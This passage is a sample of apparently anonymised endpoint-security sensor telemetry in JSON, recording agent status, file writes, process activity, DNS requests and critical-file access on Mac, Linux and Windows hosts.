26439818674540, 26439818674541, 26439818674542, 26439818674543, 26439818674544, 26439818674614, 26439818674615, 26439818674616, 26439818674617, 26439818674678, 26439818674679, 26439818674680, 26439818674882, 26439818674883, 26439818674884, 26439818674894, 26439818674895, 26439818674896, 26456998543646, 26456998543647, 26456998543648, 26456998543649, 26456998543650, 26456998543651, 26456998543652, 26456998543653, 26456998543654, 26456998543656, 26456998543721, 26456998543722, 26456998543744, 26456998543793, 26456998543811, 26456998543903, 26456998543904, 26456998543950, 26456998543963, 26456998544000, 26456998544045, 26456998544086, 26456998544087, 26456998544115, 30803505447073, 30803505447074, 30803505447075, 30803505447076, 30803505447077, 30803505447078, 30803505447194, 30803505447195, 30803505447196, 30803505447528, 30803505447529, 30803505447530, 30803505447532, 30803505447533, 30803505447534, 30803505447537, 30803505447538, 30803505447539, 30803505447541, 30803505447542, 30803505447543, 30803505447567, 30803505447568, 30803505447569, 30803505447571, 30803505447572, 30803505447573, 30803505447575, 30803505447576, 30803505447577, 30803505447579, 30803505447580, 30803505447581, 30803505447583, 30803505447584","timestamp":"1625677428827","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"LightningLatencyInfo","LightningLatencyState":"3","ConfigStateHash":"3090255842","aip":"208.100.38.84","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"LightningLatencyInfoMacV1","id":"ffffffff-1111-11eb-b44e-069a02b0ad6b","EffectiveTransmissionClass":"0","aid":"ffffffffd452449b8d1eb7d85b146650","timestamp":"1625677453146","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 
-{"event_simpleName":"NeighborListIP4","ConfigStateHash":"1620585913","NeighborList":"40-C7-29-FF-FF-FF|192.168.2.1|1|64-9A-BE-FF-FF-FF|192.168.2.10|0|F0-FF-FF-FF-A0-14|192.168.2.43|0|DE-58-FF-FF-5D-3B|192.168.2.113|0|5E-AA-FF-FF-FF-20|192.168.2.128|0|44-FF-FF-FF-03-DD|192.168.2.136|0|EE-74-EE-EE-FF-0D|192.168.2.137|0|3A-FF-FF-FF-03-26|192.168.2.144|0|DE-79-FF-FF-FF-D4|192.168.2.145|0|0E-24-FF-EE-EE-87|192.168.2.152|0|CC-D9-AC-AF-66-F8|192.168.2.153|0|","aip":"208.93.56.66","InterfaceIndex":"6","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"NeighborListIP4MacV1","id":"ffffffff-1111-11eb-9dc0-06c6f5278873","EffectiveTransmissionClass":"3","aid":"ffffffff8eb649cf8d82be1e65629a0e","timestamp":"1625677450083","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"ZipFileWritten","ContextTimeStamp":"1625677454.557","ConfigStateHash":"3090255842","ContextProcessId":"365039419134863763","ContextThreadId":"0","aip":"208.70.175.112","FileIdentifier":"07000001000000000000000000000000b1445a0900000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"ZipFileWrittenMacV1","id":"ffffffff-1111-11eb-ab6e-0668ec51180b","EffectiveTransmissionClass":"2","aid":"ffffffff2d984e32b702789b54f0f811","timestamp":"1625677454723","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Users/user6/Library/Developer/CoreSimulator/Devices/BCE6B46B-E863-4151-AA9D-D71C79438C47/data/Containers/Data/Application/1249A061-F246-4338-AE56-4373E918C9B4/Library/Application Support/com.instacart.instashopper/LogCache/2021-07-06T23:44:46.133Z.zip"} -{"AgentVersion":"6.24.13701.0","aip":"208.180.129.90","ConfigIDBase":"65994753","BiosReleaseDate":"01/06/2021","CpuFeaturesMask":"7494065083858915","ChasisManufacturer":"Apple Inc.","SystemSerialNumber":"C02F649EMD6R","event_platform":"Mac","AgentLoadFlags":"0","CpuVendor":"0","id":"ffffffff-1111-11eb-b3de-06a53f021cc9","BiosVersion":"1554.80.3.0.0 (iBridge: 
18.16.14347.0.0,0)","CpuSignature":"591594","EffectiveTransmissionClass":"0","MoboProductName":"Mac-E1008331FDC96864","timestamp":"1625677460451","MicrocodeSignature":"16045690984229358334","event_simpleName":"AgentOnline","ContextTimeStamp":"1625677445.731","SystemProductName":"MacBookPro16,1","MoboManufacturer":"Apple Inc.","ConfigStateHash":"3967242894","ConfigBuild":"1007.4.0013701.1","SystemSku":" ","SensorGroupingTags":"","ConfigurationVersion":"10","AgentLocalTime":"1625677445.731","BiosManufacturer":"Apple Inc.","Entitlements":"15","name":"AgentOnlineMacV13","ConfigIDPlatform":"4","ComputerName":"comp2","ChassisType":"9","ConfigIDBuild":"13701","SystemManufacturer":"Apple Inc.","aid":"ffffffffbea440b9aad8b5bf222d303f","ProvisionState":"1","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"Zero"} -{"event_simpleName":"CriticalFileAccessed","ContextTimeStamp":"1625677438.515","GID":"0","ConfigStateHash":"3090255842","ContextProcessId":"365053399098988534","ContextThreadId":"0","aip":"208.93.153.49","ConfigBuild":"1007.4.0013701.1","UID":"0","event_platform":"Mac","UnixMode":"384","Entitlements":"15","name":"CriticalFileAccessedMacV1","id":"ffffffff-1111-11eb-956a-02748d01bd3d","EffectiveTransmissionClass":"2","aid":"ffffffff8eca418b7a861be9c5f7de1d","timestamp":"1625677438553","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/db/dslocal/nodes/Default/users/daemon.plist"} -{"MajorVersion":"19","event_simpleName":"OsVersionInfo","OSVersionFileData":"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","ConfigStateHash":"3967242894","AgentVersion":"6.24.13701.0","aip":"208.180.129.90","MinorVersion":"6","OSVersionString":"Darwin Kernel Version 19.6.0: Tue Jan 12 22:13:05 PST 2021; 
root:xnu-6153.141.16~1/RELEASE_X86_64","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"OsVersionInfoMacV3","RFMState":"0","id":"ffffffff-1111-11eb-b3de-06a53f021cc9","OSVersionFileName":"/System/Library/CoreServices/SystemVersion.plist","EffectiveTransmissionClass":"2","aid":"ffffffffbea440b9aad8b5bf222d303f","timestamp":"1625677462356","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"ConfigBuild":"1007.8.0010912.1","event_simpleName":"ConfigStateUpdate","event_platform":"Lin","ConfigStateHash":"1284133626","ConfigStateData":"0,0,1007.8.0010912.1|1,c,0|1,10,1|1,11,0|1,12,1|1,13,1|1,14,19|1,15,3|1,1f,4|1,22,3|1,3b,1|1,59,2d|1,d3,263|1,d4,0|1,eb,36|1,201,1|2,0,a8000000032,140000000085,18000000004c,18000000004f,180000000054,18000000022a,180000000248,180000000279,18000000027a,1800000002b4,180400000079,180400000225,180c00000133,180c00000285,181000000128,181000000180,18100000021f,181000000220,181000000280,1c0400000205|","name":"ConfigStateUpdateLinV1","aip":"208.233.129.250","id":"ffffffff-1111-11eb-8e88-068a8894a447","aid":"ffffffff4f4044b689d6420d303e4ecd","timestamp":"1625677436454","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"LFODownloadConfirmation","ConfigStateHash":"1333055909","aip":"208.203.151.21","DownloadServer":"lfodown01-b.cloudsink.net","DownloadPath":"/osfm/linux/bde98295e6e5fa4c6ba2acfebc2e9943c836bf2223aebb8b29e03c44df43cb53","DownloadPort":"443","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","name":"LFODownloadConfirmationLinV1","CompletionEventId":"Event_KmaExtDownloadCompleteLinV1","id":"ffffffff-1111-11eb-8dee-0201f64cca29","aid":"ffffffff88b948c6abeeee910f6d8c33","timestamp":"1625677365906","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"KernelModuleArchiveExt11611"} 
-{"event_simpleName":"TarFileWritten","ContextTimeStamp":"1625677353.633","ConfigStateHash":"3090255842","ContextProcessId":"365049009681176519","ContextThreadId":"0","aip":"208.23.66.52","FileIdentifier":"050000010000000000000000000000005749420100000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"TarFileWrittenMacV1","id":"ffffffff-1111-11eb-9497-028a0bfcf603","EffectiveTransmissionClass":"2","aid":"ffffffffe6244708bd09a6c111f63f4a","timestamp":"1625677353895","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Users/user7/.rbenv/versions/2.6.6/lib/ruby/gems/2.6.0/cache/database_cleaner-1.8.5.gem"} -{"event_simpleName":"AgentConnect","ConfigStateHash":"3967242894","NetworkContainmentState":"0","VerifiedCertificate":"7431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf","aip":"208.42.18.78","ConfigIDBase":"65994753","FailedConnectCount":"404","ConnectType":"1","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","ConfigurationVersion":"10","Entitlements":"15","name":"AgentConnectMacV5","ConfigIDPlatform":"4","PreviousConnectTime":"1625673963.331","id":"ffffffff-1111-11eb-ba54-02a3616f6acd","ConfigIDBuild":"13701","ConnectTime":"1625677350.208","EffectiveTransmissionClass":"2","aid":"ffffffff2977460db2898ece881a9358","ProvisionState":"0","timestamp":"1625677350466","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 
-{"event_simpleName":"LFODownloadConfirmation","ConfigStateHash":"3090255842","aip":"208.25.66.51","DownloadServer":"lfodown01-b.cloudsink.net","DownloadPath":"metahash+/cfs/channelfiles/0000000503/66d5e9ea15754bcfb5f9152ec7ac90ac/C-00000503-00000000-00000001.sys","DownloadPort":"443","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"LFODownloadConfirmationMacV1","CompletionEventId":"Event_ChannelDataDownloadCompleteMacV1","id":"ffffffff-1111-11eb-8b09-069ee8920171","EffectiveTransmissionClass":"0","aid":"ffffffff5e8b4724aa10088c4f71cd9a","timestamp":"1625677525235","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"C-00000503-00000000-00000001.sys"} -{"event_simpleName":"AsepFileChange","ContextTimeStamp":"1625677482.148","ConfigStateHash":"1620585913","ContextProcessId":"364936256754041721","ContextThreadId":"0","aip":"208.140.108.235","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"AsepFileChangeMacV1","id":"ffffffff-1111-11eb-9e50-064be6e56df7","EffectiveTransmissionClass":"2","aid":"fffffffff1a64286a233d09974b1b377","timestamp":"1625677482403","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/System/Library/AssetsV2/com_apple_MobileAsset_MacSoftwareUpdate/5968e4faeba359dd5270ac282340cc4bd94d348c.asset/AssetData/payloadv2/ecc_data/System/Library/Spotlight/SystemPrefs.mdimporter/Contents/MacOS/SystemPrefs","VnodeModificationType":"6"} -{"event_simpleName":"TerminateProcess","RawProcessId":"76482","ContextTimeStamp":"1625677510.959","ConfigStateHash":"1284133626","ContextProcessId":"130732827553316","ContextThreadId":"0","aip":"208.194.125.248","ConfigBuild":"1007.8.0010912.1","event_platform":"Lin","TargetProcessId":"130732827553316","Entitlements":"15","name":"TerminateProcessLinV2","id":"ffffffff-1111-11eb-97d0-02b2813216eb","EffectiveTransmissionClass":"2","aid":"ffffffffdd094539a02b394c69a70aaf","timestamp":"1625677511067","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 
-{"ConfigBuild":"1007.4.0013701.1","event_simpleName":"FirewallEnabled","event_platform":"Mac","ConfigStateHash":"3090255842","Entitlements":"15","name":"FirewallEnabledMacV1","aip":"208.31.114.187","id":"ffffffff-1111-11eb-a9e6-067d21325a03","EffectiveTransmissionClass":"2","aid":"ffffffff70cf4070af024397f25007c7","timestamp":"1625677372544","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"FsVolumeUnmounted","VolumeName":"Install Google Drive","ContextTimeStamp":"1625677332.283","ConfigStateHash":"3090255842","aip":"208.105.245.7","VolumeMediaBSDName":"disk2s2","VolumeMountPoint":"/private/tmp/KSInstallAction.dn6J5Xa1M4/m","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"FsVolumeUnmountedMacV1","id":"ffffffff-1111-11eb-8fd9-06866dcbd3d5","EffectiveTransmissionClass":"2","aid":"ffffffffed984e248973f3ada1eb543d","timestamp":"1625677334451","cid":"ffffffff15754bcfb5f9152ec7ac90ac","VolumeIsNetwork":"0"} -{"LocalAddressIP4":"0.0.0.0","event_simpleName":"NetworkListenIP4","ContextTimeStamp":"1625677474.525","ConfigStateHash":"2300098580","ConnectionFlags":"0","ContextProcessId":"328911864662804336","RemotePort":"0","aip":"208.231.69.37","ConfigBuild":"1007.8.0011308.1","event_platform":"Lin","LocalPort":"23165","Entitlements":"15","name":"NetworkListenIP4LinV5","id":"ffffffff-1111-11eb-88fd-06a17d0fdc05","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffff2a0d484da8f7a9cf8bde7164","RemoteAddressIP4":"0.0.0.0","ConnectionDirection":"2","InContext":"0","timestamp":"1625677474879","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 
-{"event_simpleName":"ELFFileWritten","ContextTimeStamp":"1625677526.828","ConfigStateHash":"1620585913","ContextProcessId":"363122200934575406","Size":"38798952","ContextThreadId":"0","aip":"208.24.116.10","SHA256HashData":"35e590a61d32b72651b0cd23594d04f4671d79a843106136cf6abc324cc19027","FileIdentifier":"040000010000000000000000000000006793f80200000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"ELFFileWrittenMacV1","id":"ffffffff-1111-11eb-985c-02152dd35bc1","ELFSubType":"4","EffectiveTransmissionClass":"2","aid":"ffffffff28414c2293e35c360213e723","timestamp":"1625677527114","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/folders/3c/z7j1h7dx3nz3xkl10c1vyxgh0000gp/T/.com.google.Chrome.M2zGjQ/_platform_specific/x86-64/zoom_x86_64.nexe"} -{"MajorVersion":"4","event_simpleName":"OsVersionInfo","OSVersionFileData":"4e414d453d22416d617a6f6e204c696e7578220a56455253494f4e3d2232220a49443d22616d7a6e220a49445f4c494b453d2263656e746f73207268656c206665646f7261220a56455253494f4e5f49443d2232220a5052455454595f4e414d453d22416d617a6f6e204c696e75782032220a414e53495f434f4c4f523d22303b3333220a4350455f4e414d453d226370653a322e333a6f3a616d617a6f6e3a616d617a6f6e5f6c696e75783a32220a484f4d455f55524c3d2268747470733a2f2f616d617a6f6e6c696e75782e636f6d2f220a","BootArgs":"BOOT_IMAGE\u003d/boot/vmlinuz-4.14.232-176.381.amzn2.x86_64 root\u003dUUID\u003d9f548782-8f9f-4dd9-873a-436ea8f3e8a6 ro console\u003dtty0 console\u003dttyS0,115200n8 net.ifnames\u003d0 biosdevname\u003d0 nvme_core.io_timeout\u003d4294967295 rd.emergency\u003dpoweroff rd.shell\u003d0","ConfigStateHash":"3712162471","AgentVersion":"6.19.11611.0","aip":"208.203.151.21","MinorVersion":"14","OSVersionString":"Linux localhost 4.14.232-176.381.amzn2.x86_64 #1 SMP Wed May 19 00:31:54 UTC 2021 
x86_64","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","name":"OsVersionInfoLinV4","RFMState":"1","id":"ffffffff-1111-11eb-93d4-0624c36f3a79","OSVersionFileName":"/etc/os-release","aid":"ffffffff2d1245c0a32d5efcf9351272","timestamp":"1625677383466","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"CriticalFileModified","ContextTimeStamp":"1625677439.099","GID":"0","ConfigStateHash":"3090255842","ContextProcessId":"364849347227309005","ContextThreadId":"0","aip":"208.216.154.14","FileIdentifier":"04000001000000000000000000000000cdf3100100000000","ConfigBuild":"1007.4.0013701.1","UID":"0","USN":"89566685","event_platform":"Mac","UnixMode":"384","Entitlements":"15","name":"CriticalFileModifiedMacV2","id":"ffffffff-1111-11eb-9262-0268ab613b49","EffectiveTransmissionClass":"2","aid":"ffffffff761b4a7d9962dd9e7e776044","timestamp":"1625677439398","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/db/dslocal/nodes/Default/users/user9.plist/"} -{"event_simpleName":"NeighborListIP6","ConfigStateHash":"3090255842","NeighborList":"1C-AB-C0-9B-10-A2|2607:fea8:720:1bc8:1eab:c0ff:fe9b:10a2|0|","aip":"208.230.229.237","InterfaceIndex":"6","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"NeighborListIP6MacV1","id":"ffffffff-1111-11eb-ac8a-06b5e1186139","EffectiveTransmissionClass":"3","aid":"ffffffff01c7450180352a7c58a28fb4","timestamp":"1625677489786","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 
-{"event_simpleName":"NewScriptWritten","ContextTimeStamp":"1625677382.785","UserName":"user3","ConfigStateHash":"1325353086","ContextProcessId":"364952259879648742","Size":"8052","ContextThreadId":"0","aip":"208.182.203.47","SHA256HashData":"359fd6e9a46f605d491225325125502ca6ba99a73ac3141f59af96627f128fc6","FileIdentifier":"04000001000000000000000000000000ef07570000000000","ConfigBuild":"1007.4.0013806.1","event_platform":"Mac","IsOnRemovableDisk":"0","Entitlements":"15","name":"NewScriptWrittenMacV3","id":"ffffffff-1111-11eb-9dc1-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffffcebd42c0890d59b54279d3d3","timestamp":"1625677383057","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Users/user3/git/it_eng_scripts/depnotify_starter/dep_notify_starter.sh"} -{"event_simpleName":"SystemCapacity","ConfigStateHash":"1620585913","aip":"208.145.211.220","CpuClockSpeed":"2400000000","PhysicalCoreCount":"8","CpuFeaturesMask":"7494065083908067","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LogicalCoreCount":"16","Entitlements":"15","name":"SystemCapacityMacV1","CpuVendor":"0","CpuProcessorName":"Intel(R) Core(TM) i9-9980HK CPU @ 2.40GHz","id":"ffffffff-1111-11eb-b714-066001392751","CpuSignature":"591597","EffectiveTransmissionClass":"3","aid":"fffffffff2c7432859ff6bbe1a0bd6af","ProcessorPackageCount":"1","MemoryTotal":"17179869184","timestamp":"1625677387216","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 
-{"event_simpleName":"FirmwareAnalysisStatus","ConfigStateHash":"3090255842","FirmwareAnalysisEclControlInterfaceVersion":"0","aip":"208.71.69.91","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","FirmwareAnalysisEclConsumerInterfaceVersion":"0","BootTimeFunctionalityLevel":"255","ReasonOfFunctionalityLevel":"3","CurrentFunctionalityLevel":"2","Entitlements":"15","name":"FirmwareAnalysisStatusMacV2","id":"ffffffff-1111-11eb-ba57-0214a0d89bf7","EffectiveTransmissionClass":"0","aid":"ffffffff0d7b4d839912e55b4755e85b","timestamp":"1625677368429","cid":"ffffffff15754bcfb5f9152ec7ac90ac","PciAttachmentState":"65535"} -{"OutOctets":"0","CreationTimeStamp":"","aip":"208.160.204.13","OutMulticastPkts":"0","InErrors":"0","InterfaceAlias":"utun2","InDiscards":"0","InterfaceIndex":"17","event_platform":"Mac","InterfaceType":"1","id":"ffffffff-1111-11eb-a272-0294ad12fbe7","PhysicalAddressLength":"0","InUcastPkts":"0","EffectiveTransmissionClass":"2","timestamp":"1625677504544","LocalAddressIP4":"208.27.234.231","event_simpleName":"LocalIpAddressIP4","ConfigStateHash":"3090255842","PhysicalAddress":"","OutErrors":"0","InUnknownProtos":"0","OutUcastPkts":"0","InMulticastPkts":"0","ConfigBuild":"1007.4.0013701.1","InOctets":"0","NetLuidIndex":"2","Entitlements":"15","name":"LocalIpAddressIP4MacV1","aid":"ffffffff557f4b99a0afdea9ce8cd6fa","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"CommandLine":"uname 
-a","ConfigBuild":"1007.8.0009806.1","ConfigStateHash":"4288861242","Entitlements":"15","GID":"0","ImageFileName":"/bin/uname","MD5HashData":"894356eb59e279696c304f07091b7fde","NDRoot":"321385814512398584","ParentProcessId":"321385814512398584","ProcessEndTime":"1604855099.126","ProcessGroupId":"0","ProcessStartTime":"1604855099.126","RGID":"0","RUID":"0","RawProcessId":"51342","SHA1HashData":"0000000000000000000000000000000000000000","SHA256HashData":"de80fe0bd06a96543aaec5c634b08cbfc58dba88ea3a66871434a0dd3a9e9dfa","SVGID":"0","SVUID":"0","SessionProcessId":"314116638974342642","SourceProcessId":"321385814512398584","SourceThreadId":"0","TargetProcessId":"321385814512398605","UID":"0","aid":"ffffffff70d140ca9ba97f0dddd14137","aip":"208.216.134.209","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Lin","event_simpleName":"ProcessRollup2","id":"ffffffff-1111-11eb-ac87-06decddc17a1","name":"ProcessRollup2LinV5","timestamp":"1604855099681"} -{"AsepWrittenCount":"0","ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"1789338890","ContextProcessId":"317713210176499254","ContextThreadId":"0","ContextTimeStamp":"1604855096.730","DirectoryCreatedCount":"0","DnsRequestCount":"0","Entitlements":"15","ExecutableDeletedCount":"0","FileDeletedCount":"0","NetworkBindCount":"0","NetworkCapableAsepWriteCount":"0","NetworkCloseCount":"0","NetworkConnectCount":"0","NetworkListenCount":"0","NetworkRecvAcceptCount":"0","NewExecutableWrittenCount":"0","RawProcessId":"28987","SHA256HashData":"6de76ab470a16b2a825d223b996d994623473c694c60fccbb71af8691e61c5e0","SuspectStackCount":"0","SuspiciousDnsRequestCount":"0","TargetProcessId":"317713210176499254","aid":"ffffffff75fc48f15cfe5f095e605c4c","aip":"208.3.106.158","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"EndOfProcess","id":"ffffffff-1111-11eb-809e-02fff4e55a49","name":"EndOfProcessMacV14","timestamp":"1604855099646"} 
-{"AllocateVirtualMemoryCount":"0","ArchiveFileWrittenCount":"0","AsepWrittenCount":"0","BinaryExecutableWrittenCount":"0","CLICreationCount":"0","ConHostId":"38188","ConHostProcessId":"3099352216141","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3343111420","ContextData":"","ContextProcessId":"3100508103359","ContextThreadId":"93436292950223","ContextTimeStamp":"1604855097.926","CreateProcessCount":"0","CycleTime":"2937514388","DirectoryCreatedCount":"0","DirectoryEnumeratedCount":"1","DnsRequestCount":"0","DocumentFileWrittenCount":"0","EffectiveTransmissionClass":"3","Entitlements":"15","ExeAndServiceCount":"0","ExecutableDeletedCount":"0","ExitCode":"0","FileDeletedCount":"2","GenericFileWrittenCount":"0","ImageSubsystem":"3","InjectedDllCount":"0","InjectedThreadCount":"0","KernelTime":"7500000","MaxThreadCount":"4","ModuleLoadCount":"38","NetworkBindCount":"0","NetworkCapableAsepWriteCount":"0","NetworkCloseCount":"0","NetworkConnectCount":"0","NetworkConnectCountUdp":"0","NetworkListenCount":"0","NetworkModuleLoadCount":"0","NetworkRecvAcceptCount":"0","NewExecutableWrittenCount":"0","ParentProcessId":"3099350649383","PrivilegedProcessHandleCount":"0","ProcessStartTime":"1604855096.463","ProtectVirtualMemoryCount":"0","QueueApcCount":"0","RawProcessId":"33016","RegKeySecurityDecreasedCount":"0","RemovableDiskFileWrittenCount":"0","RunDllInvocationCount":"0","SHA256HashData":"faceb6f5d1cdc5ad50a4a1b92c4cd3fcdabcf7e8d418014a1b1221c1defa3d8f","ScreenshotsTakenCount":"0","ScriptEngineInvocationCount":"0","ServiceEventCount":"0","SetThreadContextCount":"0","SnapshotFileOpenCount":"0","SuspectStackCount":"0","SuspiciousCredentialModuleLoadCount":"0","SuspiciousDnsRequestCount":"0","SuspiciousFontLoadCount":"0","SuspiciousRawDiskReadCount":"0","TargetProcessId":"3100508103359","UnsignedModuleLoadCount":"0","UserMemoryAllocateExecutableCount":"0","UserMemoryAllocateExecutableRemoteCount":"0","UserMemoryProtectExecutableCount":"0","UserMemoryProtectExecutableRem
oteCount":"0","UserSid":"S-1-5-18","UserTime":"6406250","aid":"ffffffffb5db4b2e7ec89aba537adcc2","aip":"208.9.60.157","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"EndOfProcess","id":"ffffffff-1111-11eb-8726-063418e4a9e7","name":"EndOfProcessV15","timestamp":"1604855099935"} -{"AsepWrittenCount":"0","ConfigBuild":"1007.4.0009304.1","ConfigStateHash":"3344040805","ContextProcessId":"311775981885093125","ContextThreadId":"0","ContextTimeStamp":"1604855101.341","DirectoryCreatedCount":"0","DnsRequestCount":"0","Entitlements":"15","ExecutableDeletedCount":"0","FileDeletedCount":"0","NetworkBindCount":"0","NetworkCapableAsepWriteCount":"0","NetworkCloseCount":"0","NetworkConnectCount":"0","NetworkListenCount":"0","NetworkRecvAcceptCount":"0","NewExecutableWrittenCount":"0","RawProcessId":"10507","SHA256HashData":"3b00897e1eb587c5f77e3866ff6bdc80f5e70f839543242e0ee5a1581014adc3","SuspectStackCount":"0","SuspiciousDnsRequestCount":"0","TargetProcessId":"311775981885093125","aid":"ffffffff1aa0482a5ea94f64e08e7b15","aip":"208.14.207.30","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"EndOfProcess","id":"ffffffff-1111-11eb-bc03-065126dd0691","name":"EndOfProcessMacV12","timestamp":"1604855100139"} -{"AuthenticationId":"999","CommandLine":"D:\\projects\\splunk-forwarder\\bin\\splunk-powershell.exe 
--ps2","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3765958535","EffectiveTransmissionClass":"3","Entitlements":"15","ImageFileName":"\\Device\\HarddiskVolume2\\projects\\splunk-forwarder\\bin\\splunk-powershell.exe","ImageSubsystem":"3","IntegrityLevel":"16384","MD5HashData":"571391f723a439e985a2064337e2802a","ParentAuthenticationId":"999","ParentBaseFileName":"splunkd.exe","ParentProcessId":"17346335177","ProcessCreateFlags":"67634688","ProcessEndTime":"","ProcessParameterFlags":"24577","ProcessStartTime":"1604855099.406","ProcessSxsFlags":"64","RawProcessId":"6116","SHA1HashData":"0000000000000000000000000000000000000000","SHA256HashData":"7f326aad0ee45bfef93daede5597d70422d472084ae3295762654fb5021a8720","SessionId":"0","SourceProcessId":"17346335177","SourceThreadId":"107650023406","Tags":"27, 151, 12094627905582, 12094627906234","TargetProcessId":"583707537390","TokenType":"1","UserSid":"S-1-5-18","WindowFlags":"384","aid":"ffffffff3a5a424fa02450da53619745","aip":"208.216.142.127","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"ProcessRollup2","id":"ffffffff-1111-11eb-a09e-06f79d630255","name":"ProcessRollup2V17","timestamp":"1604855100030"} -{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"2784638081","ContextProcessId":"259090530891","ContextThreadId":"16409623709004","ContextTimeStamp":"1604855095.961","DnsRequestCount":"1","DomainName":"comp1.dom2","DualRequest":"0","EffectiveTransmissionClass":"3","Entitlements":"15","InterfaceIndex":"0","RequestType":"1","aid":"ffffffff4f1444bab96568879cb43556","aip":"208.216.144.255","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"DnsRequest","id":"ffffffff-1111-11eb-8077-0606f7dcf2ed","name":"DnsRequestV3","timestamp":"1604855099913"} 
-{"ConfigBuild":"1007.8.0009806.1","ConfigStateHash":"4288861242","ContextProcessId":"321385820045701199","ContextThreadId":"0","ContextTimeStamp":"1604855101.645","Entitlements":"15","GID":"0","TargetFileName":"/etc/shadow","UID":"0","UnixMode":"32768","aid":"ffffffff32ba43a483e76c6f0a4aa26f","aip":"208.216.150.197","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Lin","event_simpleName":"CriticalFileAccessed","id":"ffffffff-1111-11eb-b70d-027f9ced2001","name":"CriticalFileAccessedLinV1","timestamp":"1604855102247"} -{"CommandLine":"/usr/bin/plutil -convert xml1 -o - /Applications/Xcode.app/Contents/Developer/Platforms/AppleTVOS.platform/Developer/Library/CoreSimulator/Profiles/Runtimes/tvOS.simruntime/Contents/Resources/RuntimeRoot/System/Library/PrivateFrameworks/DiagnosticExtensions.framework/PlugIns/com.apple.DiagnosticExtensions.CrashLogs.appex/Info.plist","ConfigBuild":"1007.4.0009304.1","ConfigStateHash":"3344040805","Entitlements":"15","GID":"0","ImageFileName":"/usr/bin/plutil","MD5HashData":"d51cef1b288e2032aee9805deff04bfd","MachOSubType":"1","ParentProcessId":"311774817965726568","ProcessEndTime":"","ProcessGroupId":"311774817965726568","ProcessStartTime":"1604855111.240","RGID":"0","RUID":"0","RawProcessId":"10692","SHA1HashData":"0000000000000000000000000000000000000000","SHA256HashData":"3b00897e1eb587c5f77e3866ff6bdc80f5e70f839543242e0ee5a1581014adc3","SVGID":"0","SVUID":"0","SourceProcessId":"311776004953765502","SourceThreadId":"0","Tags":"27, 12094627905582, 12094627906234","TargetProcessId":"311776004953765502","UID":"0","aid":"ffffffff1aa0482a5ea94f64e08e7b15","aip":"208.14.207.30","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"ProcessRollup2","id":"ffffffff-1111-11eb-bc03-065126dd0691","name":"ProcessRollup2MacV3","timestamp":"1604855109180"} 
